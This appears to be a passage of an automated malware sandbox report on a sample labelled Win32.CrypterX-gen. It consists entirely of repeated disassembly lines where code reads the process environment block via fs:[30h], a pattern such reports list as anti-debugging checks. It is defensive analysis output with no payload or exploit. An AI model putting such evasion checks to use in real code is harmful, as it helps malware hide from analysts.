            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B07B70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B01AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B35AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B35AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC129A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8ADD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B012D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03ACA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B23A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1BA00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B18A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B4927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1A5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B94257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B09240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC5A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B31DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45DBF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B45DBF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B335A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B365A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03591 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B02D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B095F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B095F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1D5E0 mov eax, dword ptr fs:[00000030h]
